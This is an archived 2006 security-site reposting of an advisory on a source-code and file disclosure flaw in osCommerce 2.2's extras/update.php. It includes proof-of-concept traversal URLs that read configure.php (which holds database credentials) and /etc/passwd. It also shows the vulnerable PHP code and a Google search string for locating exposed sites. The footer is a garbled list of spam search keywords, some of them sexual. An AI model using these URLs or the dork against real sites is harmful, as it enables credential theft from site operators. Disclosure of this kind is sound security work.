about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , osCommerce <= 2.2 (extras) Source Code Disclosure Vulnerability



2006-04-14 osCommerce <= 2.2 (extras) Source Code Disclosure Vulnerability 
Rated as : Moderate Risk

---- osCommerce <= 2.2 "extras/" information/source code
disclosure ------------

software site: http://www.oscommerce.com/


if extras/ folder is placed inside the www path, you can see all files on
target
system, including php source code with database details, poc:

http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php
http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/passwd

this is the vulnerable code in update.php:

...
	include '../mysql.php';
	// if a readme.txt file exists, display it to the user
	if(!$read_me) {
		if(file_exists('readme.txt')) {
			$readme_file = 'readme.txt';
		}
		elseif(file_exists('README')) {
			$readme_file = 'README';
		}
		elseif(file_exists('readme')) {
			$readme_file = 'readme';
		}
		if($readme_file) {
			$readme = file($readme_file);
			print "<CENTER><TABLE BORDER=\"1\"
WIDTH=\"75%\" CELLPADDING=\"2\"
CELLSPACING=\"0\"><TR
BGCOLOR=\"#e7e7cc\"><TD>\n";
			print nl2br(htmlentities(implode($readme, ' ')));
			print "<HR NOSHADE SIZE=\"1\"><CENTER><A
HREF=\"update.php?read_me=1\"><B>Continue</B></A></CENTER>\n";
			print "</TD></TR></TABLE>\n";
			exit;
		}
	}
...

google search:

inurl:"extras/update.php" intext:mysql.php -display

--------------------------------------------------------------------------------
rgod

site: http://retrogod.altervista.org
mail: rgod at autistici.org
original advisory: http://retrogod.altervista.org/oscommerce_22_adv.html
--------------------------------------------------------------------------------
securitydot.net - 2006-04-14

Advertising

Copyright 2007, SecurityDot
Mon, 09 Nov 2009 07:01:48 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
sex.move Wap thrick actress ph tao168.5d6 Grupe sex indian nud Www HOLLYW centos apa paki sex Free Downl Www HOLLYW 89 com sex hacelerado japanhot maia ichat gory amember www.zhihui lo291l news for c FILM SEX moterhead Charmi sex SEX+GH Triska Kareena ka sexy angel sex18 winxp sp2 lo291l %2Fcompone brook long vBulletin MOBILEWALL www.jiawei vidya ball joomla dev Sex hewan 3227 porno indo xaraya-1.1 jk cements Sexye imag SHARE search/exp Sneha dhup Pavand sex Behnooshba www.21af.c